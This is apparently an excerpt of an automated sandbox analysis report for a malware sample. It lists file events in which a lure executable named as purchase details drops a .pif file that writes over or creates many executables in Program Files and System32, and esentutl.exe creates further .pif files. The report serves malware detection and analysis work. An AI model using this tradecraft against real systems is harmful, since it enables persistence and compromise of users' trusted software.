                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\vds.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\Locator.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\alg.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Google\Update\Install\{9DD40E31-8782-438B-BCFD-713DE1B3090F}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeFile created: C:\Users\Public\Libraries\ymafvvdS.pifJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
